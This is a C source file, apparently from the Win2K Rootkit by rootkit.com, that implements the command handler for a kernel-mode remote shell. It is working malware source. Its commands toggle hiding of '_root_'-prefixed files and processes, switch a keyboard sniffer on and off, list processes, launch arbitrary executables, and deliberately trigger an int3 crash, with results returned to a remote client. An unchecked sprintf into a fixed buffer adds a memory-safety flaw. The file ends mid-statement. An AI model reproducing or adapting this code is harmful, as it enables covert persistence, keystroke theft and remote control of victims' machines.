#include "rk_driver.h"
#include "rk_command.h"
#include "rk_defense.h"
#include "rk_process.h"
// Runtime toggles for the driver's hiding and key-sniffing features. Each flag
// is flipped by the matching command handled in process_rootkit_command()
// below; the hooks that read them are presumably in other translation units
// (the globals are non-static). Initial state: both hiding modes ON, sniffer OFF.
BOOL g_hide_directories = TRUE;   // toggled by the 'hidedir' command
BOOL g_hide_proc = TRUE;          // toggled by the 'hideproc' command
BOOL g_sniff_keys = FALSE;        // toggled by 'sniffkeys'; an empty command line also forces it OFF
// experimental exec command
int exec(PUNICODE_STRING ImageName);
////////////////////////////////////////////////////////////////////
// commands passed from the kernel shell are handled here
//
////////////////////////////////////////////////////////////////////
void process_rootkit_command(char *theCommand)
{
char _c[256];
BOOL return_prompt = TRUE;
sprintf(_c, "rootkit: process_rootkit_command %s, len %d", theCommand, strlen(theCommand));
DbgPrint(_c);
if(0 == strlen(theCommand))
{
//the user pressed return, which is meant to break out
//of sniffer-modes - so make sure all sniffers are off
if(g_sniff_keys)
{
char _t[] = "------------------------------------------\r\nsniffkeys is now OFF.\r\n";
g_sniff_keys = FALSE;
ReturnDataToClient(_t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'help'
// return a help string
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "help"))
{
char _help[] = "Win2K Rootkit by the team rootkit.com\r\n" \
"Version 0.4 alpha\r\n" \
"------------------------------------------\r\n" \
"command description \r\n" \
"\r\n" \
"ps show proclist \r\n" \
"help this data \r\n" \
"buffertest debug output \r\n" \
"hidedir hide prefixed file/dir\r\n" \
"hideproc hide prefixed processes\r\n" \
"debugint (BSOD)fire int3 \r\n" \
"sniffkeys toggle keyboard sniffer\r\n" \
"echo <string> echo the given string\r\n" \
"\r\n*(BSOD) means Blue Screen of Death\r\n" \
"if a kernel debugger is not present!\r\n" \
"*'prefixed' means the process or filename\r\n" \
"starts with the letters '_root_'.\r\n" \
"\r\n";
ReturnDataToClient(_help, strlen(_help));
}
////////////////////////////////////////////////////////////////
// Command: 'echo' 'string'
// echo back the string, useful for rootkit patches that need
// to send data to a connected client
////////////////////////////////////////////////////////////////
else if(0 == memcmp(theCommand, "echo ", 5))
{
int l = strlen(&theCommand[5]);
if(l)
{
return_prompt=FALSE;
ReturnDataToClient(&theCommand[5], l);
}
}
////////////////////////////////////////////////////////////////
// Command: 'ps'
// returns the process list running on the host
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "ps"))
{
command_get_proclist();
}
////////////////////////////////////////////////////////////////
// Command: 'exec'
// test of exec command
////////////////////////////////////////////////////////////////
else if(0 == memcmp(theCommand, "exec ",5))
{
PUNICODE_STRING uCmdLine;
ANSI_STRING aCmdLine;
aCmdLine.Length=strlen(theCommand)-5;
aCmdLine.MaximumLength=aCmdLine.Length;
aCmdLine.Buffer=&theCommand[5];
uCmdLine=ExAllocatePool(NonPagedPool,sizeof(UNICODE_STRING));
RtlAnsiStringToUnicodeString(uCmdLine,&aCmdLine,TRUE);
exec(uCmdLine);
RtlFreeUnicodeString(uCmdLine);
ExFreePool(uCmdLine);
}
////////////////////////////////////////////////////////////////
// Command: 'buffertest'
// debug function causes a large number of packets to return
// used to debug the TCP/IP stack functionality
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "buffertest"))
{
int count=0;
for(count=0;count<100;count++)
{
int x;
sprintf(_c, ".%d.", count);
x = strlen(_c);
ReturnDataToClient(_c, x);
}
}
////////////////////////////////////////////////////////////////
// Command: 'sniffkeys'
// toggles keyboard sniffer
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "sniffkeys"))
{
if(g_sniff_keys)
{
char _t[] = "keyboard sniffing now OFF\r\n";
g_sniff_keys = FALSE;
ReturnDataToClient( _t, strlen(_t));
}
else
{
char _t[] = "keyboard sniffing now ON\r\n------------------------------------------\r\n";
return_prompt=FALSE;
g_sniff_keys = TRUE;
ReturnDataToClient( _t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'hidedir'
// toggles directory hiding with '_root_' prefix
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "hidedir"))
{
if(g_hide_directories)
{
char _t[] = "directory prefix-hiding now OFF\r\n";
g_hide_directories = FALSE;
ReturnDataToClient( _t, strlen(_t));
}
else
{
char _t[] = "directory prefix-hiding now ON\r\n";
g_hide_directories = TRUE;
ReturnDataToClient( _t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'hideproc'
// toggles process hiding with '_root_' prefix
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "hideproc"))
{
if(g_hide_proc)
{
char _t[] = "process prefix-hiding now OFF\r\n";
g_hide_proc = FALSE;
ReturnDataToClient( _t, strlen(_t));
}
else
{
char _t[] = "process prefix-hiding now ON\r\n";
g_hide_proc = TRUE;
ReturnDataToClient( _t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'debugint'
// debug function causes a debug interrupt to fire
// this will BSOD the machine unless a kernel debugger is
// present.
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "debugint"))
{
__asm int 3
}
else
{
char t[256];
sprintf(t, "error: unknown or malformed command %s\r\n", theCommand);
ReturnDataToClient( t, strlen(t));
}
if(return_prompt)
//this is our prompt, an upside-down question-mark